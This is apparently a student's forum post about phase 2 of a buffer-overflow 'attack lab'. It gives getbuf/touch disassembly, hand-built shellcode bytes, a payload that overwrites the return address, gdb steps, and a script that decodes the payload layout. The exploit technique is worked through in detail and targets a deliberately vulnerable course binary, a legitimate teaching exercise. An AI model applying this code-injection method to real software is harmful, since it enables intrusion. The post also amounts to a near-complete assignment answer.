Here is my attack lab getbuf, touch1 and touch2 information:
00000000004018c2 <getbuf>:
4018c2: 48 83 ec 18 sub $0x18,%rsp
4018c6: 48 89 e7 mov %rsp,%rdi
4018c9: e8 7e 02 00 00 callq 401b4c <Gets>
4018ce: b8 01 00 00 00 mov $0x1,%eax
4018d3: 48 83 c4 18 add $0x18,%rsp
4018d7: c3 retq
00000000004018d8 <touch1>:
4018d8: 48 83 ec 08 sub $0x8,%rsp
4018dc: c7 05 16 3c 20 00 01 movl $0x1,0x203c16(%rip) # 6054fc <vlevel>
4018e3: 00 00 00
4018e6: bf 57 32 40 00 mov $0x403257,%edi
4018eb: e8 d0 f3 ff ff callq 400cc0 <puts@plt>
4018f0: bf 01 00 00 00 mov $0x1,%edi
4018f5: e8 a7 04 00 00 callq 401da1 <validate>
4018fa: bf 00 00 00 00 mov $0x0,%edi
4018ff: e8 2c f5 ff ff callq 400e30 <exit@plt>
0000000000401904 <touch2>:
401904: 48 83 ec 08 sub $0x8,%rsp
401908: 89 fa mov %edi,%edx
40190a: c7 05 e8 3b 20 00 02 movl $0x2,0x203be8(%rip) # 6054fc <vlevel>
401911: 00 00 00
401914: 39 3d ea 3b 20 00 cmp %edi,0x203bea(%rip) # 605504 <cookie>
40191a: 74 28 je 401944 <touch2+0x40>
40191c: be a8 32 40 00 mov $0x4032a8,%esi
401921: bf 01 00 00 00 mov $0x1,%edi
401926: b8 00 00 00 00 mov $0x0,%eax
40192b: e8 b0 f4 ff ff callq 400de0 <__printf_chk@plt>
401930: bf 02 00 00 00 mov $0x2,%edi
401935: e8 2c 05 00 00 callq 401e66 <fail>
40193a: bf 00 00 00 00 mov $0x0,%edi
40193f: e8 ec f4 ff ff callq 400e30 <exit@plt>
401944: be 80 32 40 00 mov $0x403280,%esi
401949: bf 01 00 00 00 mov $0x1,%edi
40194e: b8 00 00 00 00 mov $0x0,%eax
401953: e8 88 f4 ff ff callq 400de0 <__printf_chk@plt>
401958: bf 02 00 00 00 mov $0x2,%edi
40195d: e8 3f 04 00 00 callq 401da1 <validate>
401962: eb d6 jmp 40193a <touch2+0x36>
I have already done all of these steps for phase 2:
1. Vim cookie.txt; in it we have the address 0x4b7a4937
2. In Vim phase2.s, write the following and save:
   mov $0x4b7a4937, %rdi
   ret
3. gcc -c phase2.s
4. objdump -d phase2.o gives you the following:
   phase2.o: file format elf64-x86-64
   Disassembly of section .text:
   0000000000000000 <.text>:
   0: 48 c7 c7 37 49 7a 4b mov $0x4b7a4937,%rdi
   7: c3 retq
5. Save the above in vim phase2.asm
6. Save the answer in phase2.txt:
   48 c7 c7 37 49 7a 4b c3 // part 4 answer
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   98 28 61 55 00 00 00 00 // part 8 answer
   04 19 40 00 00 00 00 00 // touch2 address
7. gdb ctarget > b getbuf > r > info r, which reports 0x556128b0
8. 0x556128b0 - 0x18 = 0x55612898
9. cat phase2.txt | ./hex2raw | ./ctarget
After running it I get the following error:
Cookie: 0x4b7a4937
Type string:Touch2!: You called touch2(0x4b7a4937)
Valid solution for level 2 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAILED
I can't find what is wrong with my answer. I followed YouTube and GitHub and I get the same answer.
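To make the byte layout in the post easier to check, here is an added example (not the poster's code) that decodes the posted phase2.txt against getbuf's 0x18-byte frame and reports which 8-byte slot each value lands in. The function names and the handling of `//` annotations are assumptions of this example.

```python
import struct

BUF_SIZE = 0x18          # from `sub $0x18,%rsp` in getbuf
BUF_ADDR = 0x55612898    # buffer address computed in the post (0x556128b0 - 0x18)
TOUCH2 = 0x401904        # touch2 entry point from the disassembly

# phase2.txt as given in the post; the // annotations are the poster's.
PHASE2_TXT = """
48 c7 c7 37 49 7a 4b c3 // part 4 answer
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 28 61 55 00 00 00 00 // part 8 answer
04 19 40 00 00 00 00 00 // touch2 address
"""

def parse_hex(text):
    """Turn hex byte pairs into bytes, dropping // annotations (assumed comment style)."""
    out = bytearray()
    for line in text.splitlines():
        out += bytes.fromhex(line.split("//")[0])
    return bytes(out)

def layout(raw, buf_size=BUF_SIZE, buf_addr=BUF_ADDR):
    """Describe where each part of the input lands relative to getbuf's frame."""
    if len(raw) < buf_size + 8:
        raise ValueError("input does not reach the saved return address")
    # Every little-endian qword from the saved-return-address slot upwards.
    qwords = [struct.unpack_from("<Q", raw, off)[0]
              for off in range(buf_size, len(raw) - 7, 8)]
    return {
        "buffer": raw[:buf_size],            # bytes that stay inside the 0x18 buffer
        "saved_ret": qwords[0],              # value overwriting getbuf's return address
        "beyond_ret": qwords[1:],            # slots above the return address
        "ret_points_into_buffer": buf_addr <= qwords[0] < buf_addr + buf_size,
    }

if __name__ == "__main__":
    info = layout(parse_hex(PHASE2_TXT))
    print("buffer bytes      :", info["buffer"].hex(" "))
    print("saved return addr : %#x" % info["saved_ret"])
    print("slots above it    :", [hex(q) for q in info["beyond_ret"]])
    print("ret into buffer   :", info["ret_points_into_buffer"])
```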